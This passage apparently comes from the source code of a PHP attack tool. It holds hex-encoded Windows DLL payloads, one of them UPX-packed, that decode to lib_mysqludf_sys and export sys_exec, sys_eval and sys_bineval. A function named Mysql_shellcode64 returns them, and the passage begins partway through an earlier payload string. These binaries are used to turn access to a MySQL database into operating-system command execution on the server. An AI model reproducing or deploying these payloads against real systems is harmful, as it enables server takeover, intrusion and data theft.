"0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
2594}
2595function Mysql_shellcode64()
2596{
2597 return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41B80010000048F7D1488BD1488D79FF33C9FF158B1A0000488B56104C8BC7488B12488BC8488BD8FF15951B0000488D5424484C8D054100000048895424284C8BCB33C933D2C744242000000000FF155F1A000083CAFF488BC8FF153B1A0000488B5C2440488B74245033C04883C4305FC3CCCCCCCCCCCCCCCCCC4883EC28E817000000EB0033C04883C428C3CCCCCCCCCCCCCCCCCCCCCCCCCCCC55488BEC488B4510FF10C9C3CCCCCCCCCCCCCCCCCCCC66660F1F840000000000483B0DD9290000751148C1C11066F7C1FFFF7502F3C348C1C910E935040000CC40534883EC20B900010000FF15AF1A0000488BC8488BD8FF15AB1A0000488905642F0000488905552F00004885DB75058D4301EB2348832300E816060000488D0D47060000E8F2050000488D0D2F050000E8E605000033C04883C4205BC3CCCC488BC44889580848896810488978184C8960204155415641574883EC2033FF4D8BE04C8BE93BD70F85380100008B054D2900003BC70F8E23010000FFC8448BEF89053A29000065488B042530000000488B5808EB10483BC3741AB9E8030000FF158319000033C0F0480FB11DA82E000075E3EB0641BD010000008B05902E000083F802740FB91F000000E8AF060000E9A1010000488B0D8D2E0000FF156F1900004C8BE0483BC70F8496000000488B0D6C2E0000FF15561900004D8BFC4C8BF0488BE84883ED08493BEC725A48397D0074F1FF15701900004839450074E5488B4D00FF1528190000488BD8FF155719000048894500FFD3488B0D2A2E0000FF150C190000488B0D152E0000488BD8FF15FC1800004C3BFB75054C3BF074A54C8BFB4C8BE3EB97498BCCFF1581190000FF1513190000488905E42D0000488905E52D0000893DC72D0000443BEF0F85E300000048873DBF2D0000E9D700000033C0E9D500000083FA010F85C700000065488B0425300000008BEF488B5808EB10483BC3741AB9E8030000FF155918000033C0F0480FB11D7E2D000075E3EB05BD010000008B05672D00003BC7740CB91F000000E887050000EB3E488D1530190000488D0D19190000C7053F2D000001000000E8620500003BC77584488D15F7180000488D0DE8180000E845050000C705192D0000020000003BEF750A488BC7488705132D000048393D242D00007421488D0D1B2D0000E8D60400003BC774114D8BC4BA02000000498BCDFF15012D0000FF054B270000B801000000488B5C2440488B6C2448488B7C24504C8B6424584883C420415F415E415DC3CCCCCC488BC448895808488970104889781841544883EC30498BF08BFA4C8BE1BB010000008958E88915E926000085D275123915EF260000750A33DB8958E8E9CA00000083FA01740583FA027533488B054A1800004885C07408FFD08BD88944242085DB74134C8BC68BD7498BCCE834FDFFFF8BD88944242085DB0F848D0000004C8BC68BD7498BCCE8690400008BD88944242083FF01753585C075314C8BC633D2498BCCE84D0400004C8BC633D2498BCCE8F0FCFFFF4C8B1DE11700004D85DB740B4C8BC633D2498BCC41FFD385FF740583FF0375374C8BC68BD7498BCCE8C3FCFFFFF7D81BC923CB8BD9894C2420741C488B05A61700004885C074104C8BC68BD7498BCCFFD08BD889442420EB0633DB895C2420C705F7250000FFFFFFFF8BC3488B5C2440488B742448488B7C24504883C430415CC3CCCCCC48895C24084889742410574883EC20498BF88BDA488BF183FA017505E8BF0300004C8BC78BD3488BCE488B5C2430488B7424384883C4205FE98BFEFFFFCCCCCC48894C24084881EC88000000488D0D49260000FF15BB1500004C8B1D342700004C895C24584533C0488D542460488B4C2458E841040000488944245048837C245000744148C744243800000000488D4424484889442430488D4424404889442428488D05F425000048894424204C8B4C24504C8B442458488B54246033C9E8EF030000EB22488B842488000000488905C0260000488D8424880000004883C0084889054D260000488B05A626000048890517250000488B84249000000048890518260000C705EE240000090400C0C705E824000001000000488B05AD2400004889442468488B05A92400004889442470FF15F6140000890558250000B901000000E84E03000033C9FF15E6140000488D0D17160000FF15E1140000833D3225000000750AB901000000E826030000FF15D0140000BA090400C0488BC8FF15CA1400004881C488000000C3CCCC488D0DD9290000E90203000040534883EC20488BD9488B0DEC290000FF15CE14000048894424384883F8FF750B488BCBFF15EA140000EB7EB908000000E8DE02000090488B0DBE290000FF15A01400004889442438488B0DA4290000FF158E1400004889442440488BCBFF15D8140000488BC84C8D442440488D542438E898020000488BD8488B4C2438FF15B814000048890571290000488B4C2440FF15A614000048890557290000B908000000E861020000488BC34883C4205BC34883EC28E847FFFFFF48F7D81BC0F7D8FFC84883C428C3CC48895C2408574883EC20488D1D03160000488D3DFC150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC348895C2408574883EC20488D1DDB150000488D3DD4150000EB0E488B034885C07402FFD04883C308483BDF72ED488B5C24304883C4205FC3CCCCCCCCCCCCCCCCCCCCCCCC488BC1B94D5A0000663908740333C0C34863483C4803C833C0813950450000750CBA0B020000663951180F94C0F3C3CC4C63413C4533C94C8BD24C03C1410FB74014450FB758064A8D4C00184585DB741E8B510C4C3BD2720A8B410803C24C3BD0720F41FFC14883C128453BCB72E233C0C3488BC1C3CCCCCCCCCCCCCCCCCCCC4883EC284C8BC14C8D0D62E2FFFF498BC9E86AFFFFFF85C074224D2BC1498BD0498BC9E888FFFFFF4885C0740F8B4024C1E81FF7D083E001EB0233C04883C428C3CCFF2520130000FF2512130000FF25BC120000FF25BE120000FF25681300004883EC2883FA01751048833D97130000007506FF1537120000B8010000004883C428C3CC48895C2418574883EC20488B05DB21000048836424300048BF32A2DF2D992B0000483BC7740C48F7D0488905C4210000EB76488D4C2430FF153F120000488B5C2430FF15C4110000448BD84933DBFF15C0110000448BD84933DBFF15BC110000488D4C2438448BD84933DBFF15B31100004C8B5C24384C33DB48B8FFFFFFFFFFFF00004C23D848B833A2DF2D992B00004C3BDF4C0F44D84C891D4E21000049F7D34C891D4C210000488B5C24404883C4205FC3CCFF25EA110000FF25EC110000FF25EE110000FF25F0110000FF25F2110000FF256C110000FF255E110000CCCC40534883EC20458B18488BDA4C8BC94183E3F841F600044C8BD17413418B40084D635004F7D84C03D14863C84C23D14963C34A8B1410488B43108B480848034B08F641030F740C0FB6410383E0F048984C03C84C33CA498BC94883C4205BE9C9F6FFFFCC4883EC284D8B4138488BCA498BD1E889FFFFFFB8010000004883C428C3CCFF25E4110000CCCCCCCC40554883EC20488BEA488BD148894D28488B018B08894D24E84DFEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEAC7054D200000FFFFFFFF4883C4205DC340554883EC20488BEAB908000000E8F8FEFFFF4883C4205DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC40554883EC20488BEA488B0133C98138050000C00F94C18BC18BC14883C4205DC3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F43800000000000000000000000000000000000000000000000000000000000000000000000000004016008001000000000000000000000000000000000000003040008001000000D0400080010000004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279000000720000000000000000000000000000000000000000000000000000000000000000000000011D0C001DC40B001D740A001D5409001D3408001D3219F017E015D01915080015740A001564090015340800155211C0E41D00000200000027190000091A0000801F0000091A0000211900000F1A0000B01F000000000000010F06000F6407000F3406000F320B70010C02000C01110001060200063202501106020006320230E41D000001000000031C0000691C0000C91F0000000000000904010004420000E41D000001000000971D0000CA1D0000F01F0000CA1D00000104010004420000010A04000A3408000A3206700904010004420000E41D000001000000E4150000EB15000001000000EB150000010F06000F640A000F3408000F520B7021000000E01300000F14000004340000210000000F14000058140000F03300002108020008348C000F14000058140000F03300002108020008548E00E01300000F14000004340000192207001001860009E007D005C0037002600000581F000020040000010A04000A3406000A32067001310400317406000632023001060200063202308034000000000000000000004036000000300000203500000000000000000000A4360000A0300000000000000000000000000000000000000000000000000000F035000000000000063600000000000016360000000000003036000000000000C438000000000000AE380000000000009E380000000000008438000000000000683800000000000054380000000000003A3800000000000026380000000000001238000000000000F437000000000000D837000000000000C437000000000000B037000000000000A837000000000000DA3800000000000000000000000000000C370000000000001A37000000000000FA3600000000000044370000000000005A370000000000007E37000000000000883700000000000096370000000000009E37000000000000EA36000000000000DC36000000000000D036000000000000C236000000000000B0360000000000009A36000000000000903600000000000088360000000000007E3600000000000074360000000000006A36000000000000603600000000000056360000000000004E360000000000003237000000000000F4380000000000000000000000000000680457616974466F7253696E676C654F626A6563740058045669727475616C416C6C6F630000D503536574456E7669726F6E6D656E745661726961626C654100A30043726561746554687265616400004B45524E454C33322E646C6C0000AC04667265650000E7025F70636C6F736500E5046D616C6C6F630000EB025F706F70656E00003B0573797374656D00002B057374726E637079009B0466676574730006057265616C6C6F6300BC04676574656E7600004D5356435239302E646C6C0037015F656E636F64655F706F696E746572004E025F6D616C6C6F635F63727400CE015F696E69747465726D00CF015F696E69747465726D5F650038015F656E636F6465645F6E756C6C002D015F6465636F64655F706F696E74657200E2005F616D73675F65786974000059005F5F435F73706563696669635F68616E646C657200005A005F5F4370705863707446696C7465720083005F5F6372745F64656275676765725F686F6F6B007B005F5F636C65616E5F747970655F696E666F5F6E616D65735F696E7465726E616C0000A4035F756E6C6F636B0085005F5F646C6C6F6E65786974003D025F6C6F636B00E4025F6F6E65786974002504536C6565700031045465726D696E61746550726F636573730000AA0147657443757272656E7450726F63657373004204556E68616E646C6564457863657074696F6E46696C74657200001904536574556E68616E646C6564457863657074696F6E46696C74657200CB024973446562756767657250726573656E7400970352746C5669727475616C556E77696E640000900352746C4C6F6F6B757046756E6374696F6E456E7472790000890352746C43617074757265436F6E7465787400CC0044697361626C655468726561644C69627261727943616C6C73004E035175657279506572666F726D616E6365436F756E7465720066024765745469636B436F756E740000AE0147657443757272656E7454687265616449640000AB0147657443757272656E7450726F636573734964004F0247657453797374656D54696D65417346696C6554696D6500F0046D656D637079000000000000000070B1834B00000000DC3900000100000012000000120000002839000070390000B8390000601000003015000000100000401500003015000020150000E01300003015000050130000C013000030150000501300002011000030150000B0100000D0120000B012000080110000F1390000073A0000243A00003F3A00004B3A00005E3A00006F3A0000783A0000883A0000963A00009F3A0000AF3A0000BD3A0000C53A0000D43A0000E13A0000E93A0000F83A000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E697400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032A2DF2D992B0000CD5D20D266D4FFFFFFFFFFFFFFFFFFFF0000000000000000000